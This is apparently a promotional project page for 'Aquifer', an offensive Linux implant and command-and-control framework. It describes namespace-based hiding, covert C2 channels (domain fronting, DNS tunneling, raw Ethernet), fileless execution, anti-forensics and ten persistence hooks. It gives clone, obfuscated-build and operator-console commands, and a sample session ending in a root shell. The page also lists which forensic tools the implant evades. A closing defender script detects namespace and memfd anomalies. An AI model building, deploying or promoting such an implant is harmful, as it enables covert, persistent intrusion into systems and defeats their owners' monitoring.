Post-exploitation with namespace isolation

Kernel namespace isolation turns the OS against its own defenses. Multi-channel C2 with polymorphic beacons. 36 stealth modules for deep host-level blending.

aquifer
# Build and deploy
$ make build-release
garble -literals -tiny -seed=random build ...
UPX compressed: 8.2MB → 3.1MB
PASS: No Go module paths found
PASS: High binary entropy (7.98)

# C2 operator console
$ python3 -m c2server --db c2.db --keys server_keys.pem
aquifer> sessions
ID  Hostname    Transport  Last Seen
1   target-01   HTTPS      2s ago
5 Namespaces · 4 C2 Channels · 36 Stealth Modules · 10 Persistence methods

Kernel-level stealth operations

Namespace isolation is the foundation; every capability is designed for deep host-level blending and operational security.

Namespace Isolation

PID + Mount + Network + UTS + Cgroup namespaces with veth pair routing, NAT masquerade, and DNAT loopback for host connectivity. The implant operates in its own kernel-enforced sandbox invisible to the host.

# Two-stage execution
$ parent: guardrails → evasion → OPSEC → namespace setup
$ child: re-exec into PID+Mount+Net+UTS+Cgroup isolation

C2 Transport

Four independent channels with automatic failover. HTTPS with domain fronting and JA3 randomization. DNS tunneling via TXT records. DNS-over-HTTPS. Raw Layer 2 Ethernet frames below netfilter/iptables.

HTTPS → DNS → DoH → Raw L2 (cascading fallback)
JA3 randomization · domain fronting · traffic shaping
polymorphic beacons · ECDH + AES-256-GCM

Polymorphic Beacons

18 rotating paths, 8 content-types, 13 user-agents, randomized headers per cycle. JA3 fingerprint randomization per session. Traffic shaping mimics legitimate browsing.

Stealth Modules

eBPF cloaking, fileless execution via memfd_create, kernel keyring secrets, anti-dump regions, io_uring covert I/O, process masquerade, cgroup camouflage, and more.

Persistence

Systemd generators, NSS modules, logrotate hooks, DHCP client hooks, APT hooks, audit dispatcher, binfmt_misc, modprobe hooks, NM dispatcher, and sysctl.d tunables.

Guardrails

Hostname, CIDR, MAC, machine ID, canary file, and kill date prevent lab escape. Auto-terminates and cleans up outside target environment.

OPSEC

Memory encryption with XOR rekeying. Core dump prevention. Anti-ptrace. Environment scrubbing. Thread count reduction. I/O noise injection. Binary self-deletion.

Stealth capabilities

36 modules for deep host-level blending. Every aspect of the implant footprint is managed.

PID Namespace
Mount Namespace
Network Namespace
UTS Namespace
Cgroup Namespace
eBPF Cloaking
Fileless Exec
Kernel Keyring
Anti-Dump
io_uring I/O
Process Masquerade
JA3 Randomization
Domain Fronting
Traffic Shaping
Polymorphic Beacons
ECDH + AES-GCM
Cgroup Camouflage
D-Bus Blending
Seccomp Awareness
Landlock Sandbox
Status legend: Full / Kernel 5.10+ / Planned

Four-layer design

Two-stage execution with compile-time configuration. Parent validates, child operates inside isolated namespaces.

1. Namespace Engine

PID + Mount + Network + UTS + Cgroup isolation. Veth pair routing with NAT masquerade and DNAT loopback. Host-side cleanup on exit via parent signal handler.

2. C2 Transport

Four channels with automatic failover: HTTPS (domain fronting, JA3), DNS (TXT records), DoH, Raw L2 (AF_PACKET). ECDH key exchange + AES-256-GCM.

3. Module Framework

36 stealth modules in pkg/stealth/. eBPF cloaking, fileless execution, kernel keyring, io_uring, anti-dump, process genealogy, cgroup camouflage.

4. Persistence Layer

10 advanced methods beyond cron/systemd. Systemd generators, NSS modules, logrotate, DHCP, APT, audit, binfmt_misc, modprobe, NM dispatcher, sysctl.d.

Build and deploy

Multiple build profiles. Production builds include garble obfuscation, UPX compression, and signature patching.

build.sh
$ git clone https://github.com/Real-Fruit-Snacks/Aquifer.git
$ cd Aquifer

# Development build (stripped, static)
$ make build

# Obfuscated build
$ make build-garble

# Production release
$ make build-release
garble + UPX + signature patching

c2server.sh
# Start C2 operator console
$ pip install -r c2server/requirements.txt
$ python3 -m c2server --db c2.db --keys server_keys.pem

# Interact with implant
aquifer> sessions
ID  Hostname    Transport  Last Seen
1   target-01   HTTPS      2s ago

aquifer[1]> shell whoami
root

Know the boundaries

Hidden From

  • ps aux, top, htop — process masquerade
  • /proc/PID/environ — direct memory zeroing
  • /proc/PID/maps — region name spoofing
  • LiME, AVML — anti-dump memory protection
  • lsof — FD spoofing via bind mounts
  • Syscall monitors — io_uring bypass
  • Network forensics — polymorphic + encrypted traffic
  • Container detection — namespace + ID spoofing

Visible To

  • Kernel integrity monitoring (IMA/EVM)
  • Hardware security modules (TPM attestation)
  • Custom eBPF tracing targeting specific patterns
  • Network metadata analysis (connection timing)
  • Hypervisor-level inspection (VM introspection)
  • SELinux/AppArmor in strict enforce mode
  • Physical memory acquisition (cold boot)
  • Kernel-level rootkit detectors
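As an added, defender-side illustration of the "Visible To" column (example code, not part of Aquifer): a small Python baseline that compares each process's /proc/PID/ns links against PID 1's and flags memfd-backed or unlinked executables, the artefacts that namespace isolation, memfd_create fileless execution and binary self-deletion leave behind as long as /proc itself is trustworthy. NS_KINDS, read_proc, findings and scan_live are names chosen here, and the sample values in the comments are constructed.

```python
"""Baseline check for processes outside PID 1's namespaces or running from
memfd-backed / unlinked executables. Constructed defender example, not Aquifer code."""
import os

# The five namespace kinds the page lists; /proc/PID/ns/<kind> links to e.g. "pid:[4026531836]"
NS_KINDS = ("pid", "mnt", "net", "uts", "cgroup")

def read_proc(pid):
    """Return {"pid", "comm", "exe", "ns"} for a live /proc entry (root needed for foreign PIDs)."""
    base = f"/proc/{pid}"
    with open(f"{base}/comm") as fh:
        comm = fh.read().strip()
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = ""
    ns = {}
    for kind in NS_KINDS:
        try:
            ns[kind] = os.readlink(f"{base}/ns/{kind}")
        except OSError:
            pass
    return {"pid": pid, "comm": comm, "exe": exe, "ns": ns}

def findings(proc, init):
    """Reasons to look closer; an empty list means the process matches PID 1's view."""
    out = []
    foreign = [k for k in NS_KINDS
               if k in proc["ns"] and k in init["ns"] and proc["ns"][k] != init["ns"][k]]
    if foreign:
        out.append("namespaces differ from PID 1: " + ",".join(foreign))
    exe = proc["exe"]
    if exe.startswith("/memfd:"):          # memfd_create() images read "/memfd:<name> (deleted)"
        out.append("executable is memfd-backed: " + exe)
    elif exe.endswith(" (deleted)"):       # on-disk binary unlinked after exec
        out.append("executable unlinked from disk: " + exe)
    return out

def scan_live():
    """Walk /proc; {pid: (comm, findings)} for every process deviating from PID 1."""
    init, report = read_proc(1), {}
    for name in filter(str.isdigit, os.listdir("/proc")):
        try:
            proc = read_proc(int(name))
        except OSError:
            continue                       # exited mid-scan or unreadable
        if hits := findings(proc, init):
            report[proc["pid"]] = (proc["comm"], hits)
    return report
```

Run scan_live() as root; legitimate containers and systemd units with PrivateNetwork= also live in their own namespaces, so baseline against known container runtimes before treating a hit as hostile.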